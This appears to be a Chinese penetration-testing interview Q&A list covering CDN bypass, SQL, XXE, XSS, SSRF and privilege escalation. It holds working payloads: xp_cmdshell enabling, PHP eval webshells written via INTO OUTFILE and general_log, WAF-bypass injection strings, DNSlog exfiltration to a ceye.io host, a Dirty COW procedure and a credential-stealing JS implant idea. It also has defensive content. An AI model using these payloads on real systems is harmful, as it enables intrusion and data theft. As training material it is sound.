0x01.渗透思路篇

  来源如下图：（微信公众号：0x00实验室）

00 - 拿到目标站以后的渗透思路？

渗透测试流程：

1. 项目前期准备工作
2. 信息收集：whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息
3. 漏洞扫描：Nessus, AWVS
4. 手动挖掘：逻辑漏洞
5.  验证漏洞
6. 修复建议
7. （如果有）基线检查/复验漏洞
8. 输出报告

01 - 如何绕过CDN查真实IP？

1. 多地ping看是否有cdn
2. 邮件订阅或者rss订阅
3. 二级域名可能不会做cdn
4. nslookup http://xxx.com 国外dns
5. 查找域名历史解析记录，因为域名在上CDN之前用的IP，很有可能就是CDN的真实源IP地址
6. phpinfo上显示的信息
7. cloudflare github可以获取真实IP
8. 一个网站有icon 可以根据icon hash 来查找真实IP
9. 子域名绑定 测试子域可能回源

02 - sleep函数被禁用后怎么进行sql注入？

BENCHMARK，Get_lock函数，当都被禁用后可以用计算量比较大的语句使数据库查询时间变长，从而达到延时注入的效果。

mysql：`AND (SELECT count(*) FROM information_schema.columns A,

information_schema.columns B, information_schema.SCHEMATA C);

03 - 哪些地方存在xxe？架构问题？

xxe常见场景是如pdf在线解析、word在线解析、定制协议，留言板等，跟逻辑设计有关而与

语言无关，最好是不要让XML作为参数传输或整体结构可被用户篡改。如果一定要使用，至少要禁用DTD、Entity。

xxe危害：读取本地文件，执行系统命令，探测内网端口，攻击内网服务探测内网端口的协议有gopher file dict，不同语言支持不同的协议，是具体情况而定file http ftp是常用的

防范，python用lxml时可以对resolve_entities设为false。或者过滤用户提交的xml

客户端也可以有xxe攻击，有的网站会使用office打开docx进行解析Java解析XML的常用三方库，如果不禁用DTD、Entity都会导致XXE漏洞：

javax.xml.stream.XMLStreamReader;

javax.xml.parsers.DocumentBuilderFactory;

04 - 如何绕过Http-only？

HTTP-Only禁止的是JS读取cookie信息，Http Trace攻击就可以将你的Header里的

Cookie回显出来，利用Ajax或者flash就可以完成这种攻击；或者配置或者应用程序上可能

Bypass，比如header头的泄漏

05 - SQL二次注入？

        第一次进行数据库插入数据的时候，仅仅只是使用了`addslashes`或者是借助`get_magic_quotes_gpc`对其中的特殊字符进行了转义，在写入数据库的时候还是保留了

原来的数据，但是数据本身还是脏数据。

        在将数据存入到了数据库中之后，开发者就认为数据 是可信的。在下一次进行需要进行查询的时候，直接从数据库中取出了脏数据，没有进行进一 步的检验和处理，这样就会造成SQL的二次注入。

交友网站，填写年龄处是一个注入点，页面会显示出与你相同年龄的用户有几个。使用and

1=1确定注入点，用order by探测列数，union select探测输出点是第几列，

1. 爆库 `group_concat(schema_name) from information_schema.schemata`
2. 爆表 `group_concat(table_name) from information_schema.schemata where table_schema='hhh'`
3. 获取数据 `concat(flag) from flag`

修复：在从数据库或文件中取数据的时候，也要进行转义或者过滤。

06 - SQLserver提权

xp_cmdshell提权

• xp_cmdshell是Sql Server中的一个组件，可以用来执行系统命令,在拿到sa口令之后，经常可以通过xp_cmdshell来进行提权

前提

• getshell或者存在sql注入并且能够执行命令。
• sql server是system权限，sql server默认就是system权限

启用xp_cmdshell

• EXEC master..sp_configure 'show advanced options', 1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell', 1;RECONFIGURE;

# 通过xp_cmdshell执行系统命令

• Exec master.dbo.xp_cmdshell 'whoami' sp_oacreate提权在xp_cmdshell被删除或者出错情况下，可以充分利用SP_OACreate进行提权，

前提：

• 需要同时具备sp_oacreate和sp_oamethod两个功能组件

开启组件

• EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;

执行系统命令（无回显）

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami'

通过沙盒执行命令

• 开启沙盒

        exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxM ode','REG_DWORD',1

• 利用jet.oledb执行命令

        select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32

\ias\dnary.mdb','select shell("whoami")')

• 通过Agent Job执行命令

        修改开启Ageent Job，执行无回显CobaltStrike生成powershell上线

07 - GPC是什么？GPC之后怎么绕过？

如果`magic_quotes_gpc=On`，PHP解析器就会自动为post、get、cookie过来的数据

增加转义字符“\”，以确保这些数据不会引起程序，特别是数据库语句因为特殊字符（认为是

php的字符）引起的污染。

08 - 如何防范webshell

防范的措施大概有三种

• 第一种的思路是将专门存放上传文件的文件夹里面的脚本类型文件，解析成其他类型的文件， 服务器不会以脚本类型来执行它。
• 第二种是匹配文件夹里的脚本类型文件，将其设置为无法读取及操作。
• 第三种是将文件上传到一个单独的文件夹，给一个二级的域名，然后不给这个虚拟站点解析脚 本的权限，听说很多网站都用这种方式。

09 - webshell检查思路

        webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。

        黑客通过浏览器以HTTP协议访问Web Server上的一个CGI文件，是一个合法的TCP连接，TCP/IP的应用层之下没有任何特征，只能在应用层进行检测。黑客入侵服务器，使用

webshell，不管是传文件还是改文件，必然有一个文件会包含webshell代码，很容易想到

从文件代码入手，这是静态特征检测；webshell运行后，B/S数据通过HTTP交互，HTTP请

求/响应中可以找到蛛丝马迹，这是动态特征检测。

• 静态检测

        静态检测通过匹配特征码，特征值，危险函数函数来查找webshell的方法，只能查找已知的 webshell，并且误报率漏报率会比较高，但是如果规则完善，可以减低误报率，但是漏报率 必定会有所提高。优点是快速方便，对已知的webshell查找准确率高，部署方便，一个脚本 就能搞定。缺点漏报率、误报率高，无法查找0day型webshell，而且容易被绕过。

• 静态检测配合人工

        一个检查工具：GitHub - he1m4n6a/findWebshell: findWebshell是一款基于python开发的webshell检测工具。

• 动态检测

        Linux下就是nobody用户起了bash，Win下就是IIS User启动cmd，这些都是动态特征。

再者如果黑客反向连接的话，那很更容易检测了，Agent和IDS都可以抓现行。Webshell总

有一个HTTP请求，如果我在网络层监控HTTP，并且检测到有人访问了一个从没反问过得文

件，而且返回了200，则很容易定位到webshell，这便是http异常模型检测，就和检测文件

变化一样，如果非管理员新增文件，则说明被人入侵了。缺点也很明显，黑客只要利用原文件 就很轻易绕过了，并且部署代价高，网站时常更新的话规则也要不断添加。

• 日志检测

        使用Webshell一般不会在系统日志中留下记录，但是会在网站的web日志中留下Webshell页 面的访问数据和数据提交记录。日志分析检测技术通过大量的日志文件建立请求模型从而检测 出异常文件，称之为：HTTP异常请求模型检测。

• 寻找webshell

1. 自动化查找 D盾 河马 fotify
2. 手动查找 windows sublime、全文件夹查找 IDE PHPSTOR、全局查找 Linux、命令查找 `grep -rn "eval(" *` webshell特征 PHP的危险函数还有`phar <?php XXXXX`

10 - 如何查找DNS解析记录

1. 查看浏览器缓存
2. 查看系统缓存
3. 查看路由器缓存
4.  查找ISP DNS缓存
5. 递归搜索。根据网址，发送一个DNS请求，UDP请求，端口为543，会请求一个 DNS服务器，DNS服务器会不断递归查找这个网址的IP

11 - 登录页面的漏洞

• 注入点以及万能密码
• 敏感信息泄露
• 验证码绕过
• 无限注册帐号
• 任意密码重置
• 明文传输
• 越权漏洞

12 - 如何快速判定XSS类型？

存储型XSS：你发送一次带XSS代码的请求，以后这个页面的返回包里都会有XSS代码；

反射型XSS：你发送一次带XSS代码的请求，只能在当前返回的数据包中发现XSS代码；

DOM型XSS：你发送一次带XSS代码的请求，在返回包里压根儿就找不到XSS代码的影子；

CSP策略：浏览器内容安全策略，减少xss攻击。

13 - CSRF、SSRF和重放攻击有什么区别？

• CSRF是跨站请求伪造攻击，由客户端发起
• SSRF是服务器端请求伪造，由服务器发起重放攻击是将截获的数据包进行重放，达到身份认证等目的

14 - CSRF 和 XSS 和 XXE 有什么区别，以及修复方式？

        XSS是跨站脚本攻击，用户提交的数据中可以构造代码来执行，从而实现窃取用户信息等攻击。

修复方式：对字符实体进行转义、使用HTTP Only来禁止JavaScript读取Cookie值、输入时校验、浏览器与Web应用端采用相同的字符编码。

        CSRF是跨站请求伪造攻击，XSS是实现CSRF的诸多手段中的一种，是由于没有在关键操作执行时进行是否由用户自愿发起的确认。

修复方式：筛选出需要防范CSRF的页面然后嵌入Token、 再次输入密码、检验Referer.

        XXE是XML外部实体注入攻击，XML中可以通过调用实体来请求本地或者远程内容，和远程文件保护类似，会引发相关安全问题，例如敏感文件读取。修复方式：XML解析库在调用时严格禁止对外部实体的解析。

15 - MongoDB注入方式

利用正则：找到y开头的name `db.items.find({name: {$regex:"^y"}})`

一些payload

1. `?login[$regex]=^&password[$regex]=^`
2. `?login[$not][$type]=1&password[$not][$type]=1`

16 - mysql的网站，5.0以上和5.0以下有什么区别？

5.0 以下没有information_schema这个系统表，无法列表名等，只能暴力跑表名。

5.0 以下是多用户单操作，5.0以上是多用户多操作

17 - MySQL写shell的问题

1. 写shell用什么函数？

•  `select '<?php phpinfo()> into outfile 'D:/shelltest.php'`
•  `dumpfile`
• `file_put_contents`

2. outfile不能用了怎么办？

`select unhex('udf.dll hex code') into

dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';`可以UDF提权

https://www.cnblogs.com/milantgh/p/5444398.html

3. dumpfile和outfile有什么不一样？outfile适合导库，在行末尾会写入新行并转义，

因此不能写入二进制可执行文件。

4.sleep()能不能写shell？

5. 写shell的条件？

• 用户权限
• 目录读写权限
• 防止命令执行：`disable_functions`，禁止了`disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source`，但是可以用dl扩展执行命令或者ImageMagick漏洞

open_basedir: 将用户可操作的文件限制在某目录下mysql写shell的条件

1. 网站可访问路径的绝对路径
2. secure_file_priv 的值非NULL或包含了导出的绝对路径 secure_file_priv的值在mysql配置文件my.ini中设置，这个参数用来限制数据导入导出 Mysql>=5.5.53 默认为NULL，即默认禁止导入导出Mysql<5.5.53 默认为空，即默认无限制
3. mysql服务有对网站可访问路径的写权限
4. mysql连接用户有FILE权限/ROOT用户或ROOT权限
5. GPC关闭//未对闭合用的引号转义

outfile 和 dumpfile的路径不支持hex，必须有引号包裹

## mysql日志写shell

与导出函数写Shell相比，规避了 secure_file_priv 的限制

1. 网站可访问路径的绝对路径
2. mysql服务有对网站可访问路径的写权限
3. mysql连接用户有权限开启日志记录和更换日志路径/ROOT权限
4. GPC关闭/未对闭合用的引号转义

        虽然日志路径可以hex编码，但被记入日志的查询语句中的shell内容需要引号包裹，加

`\`后传到数据库执行会报错，无法记录进日志

root权限

GPC 关闭（能使用单引号），magic_quotes_gpc=On

有绝对路径（读文件可以不用，写文件必须）

没有配置–secure-file-priv

成功条件：有读写的权限，有 create、insert、select 的权限

18 - disable_functions绕过

1. 黑名单总有漏网之鱼，多尝试一些函数
2. LD_PRELOAD：原理就是劫持系统函数，使程序加载恶意动态链接库文件，从而执行系统命令等敏感操作
3. lmageMagick：利用lmageMagick命令执行漏洞（CVE-2016-3714）
4. Windows系统组件COM绕过
5. PHP7.4FFI绕过
6. 利用Bash破壳（CVE-2014-6271）漏洞绕过
7. 利用imap_open()绕过（CVE-2018-19518）
8. 利用pcntl插件绕过

19 - 拿到webshell不出网情况下怎么办

reg上传去正向连接。或探测出网协议，如dns，icmp

20 - 脏牛提权漏洞

脏牛漏洞，Dirty COW， CVE-2016-5195

漏洞范围：Linux内核 >= 2.6.22

简要分析：该漏洞具体为，Linux内核的内存子系统在处理写入复制（copy-on-write,

COW）时产生了竞争条件（race condition）。恶意用户可利用此漏洞，来获取高权限，对

只读内存映射进行写访问。竞争条件，指的是任务执行顺序异常，可导致应用崩溃，或令攻击者有机可乘，进一步执行其他代码。利用这一漏洞，攻击者可在其目标系统提升权限，甚至可能获得root权限

步骤：

1. 查看系统版本和用户权限
2. 下载exp到本地 使用gcc -pthread dirty.c -o dirty -lcrypt命令对dirty.c 进行编译，生成一个dirty的可执行文件
3. 执行./dirty 密码命令，即可进行提权

23 - sqlmap的--level和--risk的区别

level级别越高发送的请求越多，并且在level3以上时会尝试对referer注入。

而risk则是风险系数，默认是1会测试大部分的测试语句，2会增加基于事件的测试语句，3会

增加OR语句的QL注入测试。在有些时候，例如在UPDATE的语句中，注入一个OR的测试语句， 可能导致更新的整个表，可能造成很大的风险

24 - 存储型XSS怎么利用？

        XSS攻击的原理是通过修改或者添加页面上的JavaScript恶意脚本，在浏览器渲染页面的时 候执行该脚本，从而实现窃取COOKIE或者调用Ajax实现其他类型的CSRF攻击，还可以插入beef进行钓鱼等

• CORS（浏览器同源策略）
• js =>ajax 去请求其他网站的东西
• test.com 根据浏览器的CORS策略 他只能在test.com里面请求东西
• test.com 调用ajax 去访问 xxxx.com assdasd.test.com 如果目标的CORS头 默认不放行test.com 这样 test.com 的ajax请求就不会访问其他网站

25 - MYSQL 数据库的站，只有一个 80 端口开放？

更改了端口 站库分离；3306端口不对外开放。

26 - 审查上传点的元素有什么意义

有些站点的上传文件类型限制是在前端实现的，这时只要增加上传类型就能

突破限制了。

27 - 3389 无法连接

没开放 3389 端口;端口被修改;防护拦截;处于内网(需进行端口转发)

28 - 目标站无防护，上传图片可以正常访问，上传脚本格式访问则 403

有可能Web服务器配置把上传目录写死了不执行相应脚本，尝试改后缀名绕过。

29 - Mysql几种提权方式

Mysql_UDF 提权

        利用了root高权限，创建带有调用 cmd 的函数的 udf.dll 动态链接库，

导出 udf.dll 文件后，我们就可以直接在命令框输入 cmd

限制条件：

1. MySQL 数据库没有开启安全模式（确认secure_file_priv=''是否为空）
2. 已知的数据库账号具有对MySQL数据库insert和delete的权限，最好是root最高权限。
3. shell有写入到数据库安装目录的权限。

MOF提权：

        MOF提权是一个有历史的漏洞，基本上在Windows Server 2003的环境下才可以成功。提权的原理是C:/Windows/system32/wbem/mof/目录下的mof文件每隔一段时间（几秒钟左

右）都会被系统执行，因为这个 MOF 里面有一部分是 VBS脚本，所以可以利用这个VBS脚本 来调用CMD来执行系统命令，如果 MySQL有权限操作 mof 目录的话，就可以来执行任意命令了。

30 - 针对token的测试 会注意哪些方面？

针对token的攻击，一是对它本身的攻击，重放测试一次性、分析加密规则、校验方式是否正

确等，二是结合信息 泄露漏洞对它的获取，结合着发起组合攻击信息泄露有可能是缓存、日

志、get，也有可能是利用跨站很多跳转登录的都依赖token，有一个跳转漏洞加反射型跨站

就可以组合成登录劫持了另外也可以结合着其它业务来描述token的安全性及设计不好怎么被

绕过比如抢红包业务之类的

31 - token和refer横向对比 谁安全等级高？

token安全等级更高，因为并不是任何服务器都可以取得referer，如果从HTTPS 跳到

HTTP，也不会发送referer。并且FLASH一些版本中可以自定义referer。但是token的

话，要保证其足够随机且不可泄露。(不可预测性原则)

32 - SQL注入写shell 单引号被过滤咋办？

写 shell: root 权限，GPC 关闭，知道文件路径outfile函数

http://127.0.0.1:81/sqli.php?id=1 into outfile

C:\\wamp64\\www\\phpinfo.php' FIELDS

TERMINATED BY '<?php phpinfo(); ?>'

http://127.0.0.1:81/sqli.php?id=-1 union select

1,0x3c3f70687020706870696e666f28293b203f3e,3,4 into outfile

C:\\wamp64\\www\\phpinfo.php'`

宽字节注入

代替空格的方法

%0a、%0b、%a0 等/**/ 等注释符<>

33 - 宽字节注入的原理？

产生原理

        在数据库使用了宽字符集而WEB中没考虑这个问题的情况下，在WEB层，由于 0XBF27是两个 字符，在PHP中比如addslash和 magic_quotes_gpc 开启时，由于会对 0x27 单引号进 行转义，因此0xbf27会变成0xbf5c27,而数据进入数据库中时，由于 0XBF5C 是一个另外

的字符，因此\转义符号会被前面 的 bf 带着"吃掉"，单引号由此逃逸出来可以用来闭合语句。

根本原因

        character_set_client(客户端的字符集)和 character_set_connection(连接层的

字符集)不同,或转换函数

如iconv、mb_convert_encoding使用不当。

解决办法

        统一数据库、Web 应用、操作系统所使用的字符集，避免解析产生差异，最好都设置为 UTF- 8。或对数据进行正确的转义，如mysql_real_escape_string+mysql_set_charset的使用。

34 - img标签除了onerror属性外，还有其他获取管理员路径的办法？

1. 服务器修改apache配置文件，配置.jpg文件以php方式来解析AddType application/x-httpd-php .jpg <img src=http://xss.tv/1.jpg> 会以php方 式来解析
2. c定一个远程的脚本文件，获取 referer

35 - 代码执行、文件读取、命令执行函数有哪些？

1）代码执行：

        eval,preg_replace+/e,assert,call_user_func,call_user_func_array,cre

ate_function

2）文件读取：

        file_get_contents(),highlight_file(),fopen(),read

file(),fread(),fgetss(),

fgets(),parse_ini_file(),show_source(),file()等

3）命令执行：

        system(), exec(), shell_exec(), passthru() ,pcntl_exec(),

popen(),proc_open()

36 - 为什么aspx木马权限比asp大？

aspx使用的是.net技术。IIS中默认不支持，ASP只是脚本语言而已。入侵的时候asp的木马

一般是guest权限…APSX的木马一般是users权限。

37- 提权为何选择可读写目录？不用带空格的目录？

因为exp执行多半需要空格界定参数

38 - 有shell情况下如何使用xss实现对目标站的长久控制？

后台登录处加一段记录登录账号密码的 js，并且判断是否登录成功，如果登录成功，就把账

号密码记 录到一个生僻的路径的文件中或者直接发到自己的网站文件中。(此方法适合有价值

并且需要深入控 制权限的网络)。 在登录后才可以访问的文件中插入XSS脚本

39 - 发现uid=100注入点，获取shell的思路？

有写入权限的，构造联合查询语句使用 using INTO OUTFILE，可以将查询的输出重定向到

系统的文件中，这样去写入WebShell使用sqlmap –os-shell原理和上面一种相同，来直

接获得一个Shell，这样效率更高通过构造联合查询语句得到网站管理员的账户和密码，然后

扫后台登录后台，再在后台通过改包上传等方法上传Shell.

40 - 如何拿一个站点的webshell？

上传，后台编辑模板，sql注入写文件，命令执行，代码执行，一些已经爆出的cms 漏洞，比

如dedecms后台可以直接建立脚本文件，wordpress上传插件包含脚本文件zip压缩包等

41 - 手工判断目标站是Windows还是Linux？

1. Linux大小写敏感 Windows不敏感

2. 通过Ping的值 TTL

        Linux值 64或者255

        win 32 128

        unix 255

42 - SVN/GIT 源代码泄露

1. 在使用 SVN 管理本地代码过程中，会自动生成一个名为.svn 的隐藏文件 夹，其中包含重要的源代码信息/.git/config
2. 使用git进行版本控制，对站点自动部署。如果配置不当，可能会将.git文件夹直接部署到线上环境。这就引起git泄露漏洞/.svn/entries

43 - 项目上漏洞扫描需注意哪些？

跟客户确认是否充许登录扫描、扫描并发连接数及线程数、是否充许暴力破确，什么时间扫

描、通知客户备份一下数据，开启业务系统及网站运维监控，以免断机可及时恢复

44 - Mysql注入点，工具对目标站点写一句话 需要哪些条件？

root权限、网站的绝对路径、需要数据库开启 secure_file_priv相当于

secure_file_priv的值为空，不为空不充许写入webshell（默认不开启，需要修改

my.ini 配置文件）

45 - 为何一个mysql数据库的站，只有一个80端口开放

1. 更改了数据库端口，没有扫描出来。
2. 站库分离。
3. 3306 端口不对外开放

46 - 报错注入的函数？

updatexml、extractvalue、floor、exp

47 - Post和Get都做了防注入，可以采用什么方式绕过？

Cookies注入绕过

48 - SQL注入只能查帐号密码？

最低权限都可以查找帐号和密码，如 mssql sa 权限可以获取系统权限，dbowner 可以获

取 Webshell，public 可以脱库；mysql root 权限、知道网站的绝对路径、数据库

my.ini 配置文件 secure_file_priv 值为空时，就可以获取 webshell 并执行操作系

统命令。

49 - sqlmap，怎么对一个注入点注入？

1. 如果是 get 注入，直接，sqlmap -u "注入点网址".
2. 如果是 post 注入，可以 sqlmap –r "burp 地址访问包”
3. 如果是 cookie，X-Forwarded-For等，可以访问的时候，用burpsuite抓包，注入处 用号替换，放到文件里，然后sqlmap -r "文件地址"，记得加上—level 3参数

50 - SQL注入的防护方法？

1. 涵数过滤，如!is_numeric 涵数 //判断变量 id 是否为数字
2. 直接下载相关防范注入文件，通过 incloud 包含放在网站配置文件里面，如 360、阿里 云、腾迅提供的防注入脚本
3. 使用白名单来规范化输入验证方法
4. 采用 PDO 预处理
5. 使用 Waf 拦截

51 - 盲注IF被过滤怎么绕过？

如果 and if 被 waf 拦截，我们可以使用内联注释来绕过函数的检测，如：

xor /*!if*/(length(/*!database*//*!()*/)>=1,/*!sleep*//*!

(1)*/,curdate())%23

^ /*!if*/(length(/*!database*//*!()*/)>=1,/*!sleep*//*!

(1)*/,curdate())%23

/*!if*/(length(/*!database*//*!()*/)>=1,/*!sleep*//*!

(1)*/,curdate())%23

and case when 1!=0 then /*!sleep*//*!(5)*/ else 0 end %23

52 - SQL注入无回显，利用DNSlog如何构造？

1. 没有回显的情况下，一般编写脚本，进行自动化注入。但与此同时，由于 防火墙的存在，容易被封禁 IP，可以尝试调整请求频率，有条件的使用代理池 进行请求。
2. 此时也可以使用 DNSlog 注入，原理就是把服务器返回的结果放在域 名中，然后读取 DNS 解析时的日志，来获取想要的信息。
3. Mysql 中利用load_file()构造payload ‘ and if((select load_file(concat(‘\\\\’,(select database()),’.xxx.ceye.io\\abc’))),1,0)#
4. Mssql 下利用 master..xp_dirtree 构造 payload DECLARE @host varchar(1024);SELECT @host=(SELECT db_name())+’.xxx.ceye.io’;EXEC(‘master..xp_dirtree”\’+@host+’ \foobar$”‘);

53 - PHPadmin写shell的方法？

一、常规导入 shell 的操作

创建数据表导出 shell

CREATE TABLE `mysql`.`shadow9` (`content` TEXT NOT NULL );

INSERT INTO `mysql`.`shadow9` (`content` ) VALUES (‘<?php

@eval($_POST[pass]);?>’);

SELECT `content` FROM `shadow9` INTO OUTFILE

‘C:\\phpStudy\\WWW\\90sec.php’;

DROP TABLE IF EXISTS `shadow9`;

二、一句话导出shell：

select '<?php @eval($_POST[pass]);?>' into outfile 'c:/phpstu

dy/www/90sec.php';

select '<?php @eval($_POST[pass]);?>' into outfile 'c:\\phpst

udy\\www\\90sec.php';

select '<?php @eval($_POST[pass]);?>' into dumpfile 'c:\\phps

tudy\\www\\bypass.php';

三、日志备份获取 shell

show global variables like "%genera%"; //查询general_

log配置

set global general_log='on'; //开启 general log 模 式

SET global general_log_file='D:/phpStudy/WWW/cmd.php'; //设

置日志文件保存路径

SELECT '<?php phpinfo();?>'; //phpinfo()写入日志

文件

set global general_log='off'; //关闭 general_log模 式

54 - 预编译能不能百分百防御SQL注入？如不能请举例

$pdo->query('SET NAMES gbk');

$var = "\xbf\x27 OR 1=1 /*";

$query = 'SELECT * FROM test WHERE name = ? LIMIT 1';

$stmt = $pdo->prepare($query);

$stmt->execute(array($var)); #类似于宽字节注入

$dbh = new PDO("txf");

$name = $_GET['name'];

$stmt = $dbh->prepare('SELECT * FROM ' . $name . ' where usern

ame = :username');

$stmt->execute( array(':username' => $_REQUEST['username'])

);

#参数 name 是一串数组，PDO 不会生效

$stmt = $dbh->prepare('SELECT * FROM foo ORDER BY

:userSuppliedData');

#PDO对DDL不生效

55 - SQL注入时 and or 被过滤怎办？

1. 大小写变形
2. 编码
3. 添加注释
4. 双写法
5. 利用符号形式
6. 浮点数 #数字被注释
7. 函数替代 #符号被注释

56 - 快速找文件下载漏洞？

一般链接形式:

download.php?path=

down.php?file=

data.php?file=

download.php?filename=

或者包含参数:

&Src=

&Inputfile=

&Filepath=

&Path=

&Data=

57 - 任意文件下载的防范方法？

1. 过滤"."，使用户在url中不能回溯上级目录
2. 正则严格判断用户输入参数的格式
3. php.ini 配置open_basedir限定文件访问范围

58 - CORS产生利用方式？绕过同源策略方式？

1 - CORS 全称是”跨域资源共享”（Cross-origin resource sharing）,Origin源未 严格，从而造成跨域问题,允许浏览器向跨源服务器，发出 XMLHttpRequest请求

2 - Origin 为*的时候，使用 curl 测试 CORS，curl <url> -H “Origin: https://evil.com” -I 再寻找的 api 接口是否有敏感信息泄漏。

3 - 同源：协议相同、域名相同、端口相同，绕过同源策略限制的方法：

1. document.domain 属性
2. 片段识别符（URL 后加#号）
3. window.name
4. 跨文档通信 API
5. JSONP
6. CORS
7. WebSockets

4-jsonp 跨域利用：获取 JSON 数据并编码发送到远程服务器

59 - XSS弹窗函数和常见的XSS绕过策略？

alert，confirm，prompt 三种函数

绕过策略：

1. 大小写混合
2. 双写
3. 编码
4. fuzz 低频使用标签 <details/open/ontoggle>
5. fuzz 低频使用函数 ontoggle 等
6. <img/src=1>
7. %0a 或者%0d 绕过

60 - SSRF利用Redis写shell

1）SSRF 服务端请求伪造

1. 对内网扫描，获取 banner
2. 攻击运行在内网的应用，主要是使用 GET 参数就可以实现的攻击（比如 Struts2，sqli 等）
3. 利用协议读取本地文件
4. 云计算环境 AWS Google Cloud 环境可以调用内网操作 ECS 的 API

2）如 webligic SSRF 漏洞

        通过 SSRF 的 gopher 协议操作内网的 redis，利用 redis 将反弹 shell 写入

crontab 定时任务，url 编码，将\r 字符串替换成%0d%0a

61 - 登录页面可能存在的漏洞？

62 - 描述一下第三方应用软件提权方法？

1. Serv-u 安全性测试（分为有配置文件有修改权限与 servUDaemon.exe 默认管理员帐号和密码没修改进行提权）
2. FlashFXP 安全性测试（攻击者只需通过 webshell 下载 quick.dat、 sites.dat、stats.dat这三个文件进行本地替换，就可以用星号查看器直接查看连接密码）
3. Gene6 FTP 安全性测试（Gene6 FTP 默认安装路径是 C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini 其中 Remote.ini 是主配置文件，管理员登 录的 ip、端口和密码都存储在这。但 Gene6 管理员帐号只充许本地登录。 对于渗透测试人 员来讲只需要通过 Webshell 转发端口就可以进行远程连接）
4. PcanyWhere 安全性测试（找到pcanywhere 安装目录下面的*.CIF 直接用工具破解 密码就行）
5. VNC安全性测试（通过脚本大马读取 VNC 连接密码： HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password）
6. Radmin 安全性测试（导出注册表 hash，用 Radmin 的 hash 版连接就行）
7. Zend 安全性测试（攻击者只需要通过 webshell对原 ZendExtensionManager.dll 重命名，并通过工具重新生成一个来木马 ZendExtensionManager.dll 让 apche 重启 加载。服务器就会被控制）
8. 启动项安全性测试
9. 服务替换安全性测试
10. Dll 劫持安全性测试（直接用Tools lpk sethc v4.0 生成 dll马通过 webshell 上传到杀毒软件，输入法等管理员常运行exe软件目录，等着dll 劫持）
11. Perl安全性测试（低版本可以直接执行系统命令）

63 - xpcmdshell禁用了有什么方法提权

可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的步

骤可参考：

        用查询分析器，依次执行下面的语句，就可以了.

        USE master

        EXEC sp_configure 'show advanced options', 1

        RECONFIGURE WITH OVERRIDE

        EXEC sp_configure 'xp_cmdshell', 1

        RECONFIGURE WITH OVERRIDE

        EXEC sp_configure 'show advanced options', 0

就可以顺利的执行 CMDSHELL 了

64 - 网站后台Getshell的方法？

webshell路径直接上传

数据库备份getshell

修改网站上传类型配置拿webshell

执行sql语句写入webshell

通过数据库拿webshell

命令执行拿webshell

phpmyadmin写sehll

65 - fastjson不出网怎么利用

目前公开已知的poc有两个：

• com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
• org.apache.tomcat.dbcp.dbcp2.BasicDataSource

第一种利用方式需要一个特定的触发条件:

解析JSON的时候需要使用Feature才能触发，参考如下代码：

JSONObject.parseObject(sb.toString(), new Feature[]
{Feature.SupportNonPublicField});

第二种利用方式：则需要应用部署在Tomcat应用环境中，因为Tomcat应用环境自带

tomcat-dbcp.jar 对于SpringBoot这种自带Tomcat可以直接以单个jar文件部署的需要

在maven中配置tomcat- dbcp。

而且对于不同的Tomcat版本使用的poc也不同：

• Tomcat 8.0以后使用：org.apache.tomcat.dbcp.dbcp2.BasicDataSource• Tomcat
• 8.0以下使用： org.apache.tomcat.dbcp.dbcp.BasicDataSource

66 - 遇到XXE盲注怎么办？

如果遇到XXE无回显注入的话，可以选择使用DNS外带和外部参数实体注入

1. 在攻击者自己的公网服务器，准备一个test.dtd通过base64为将读取的内容加密得到的值当作传参值，发送给攻击者的公网服务器
2. 受害者那边，通过外部参数实体注入访问攻击者公网服务器下的test.dtd文件 3-最后看 攻击者公网服务器的日志，转码得到受害者服务器的内容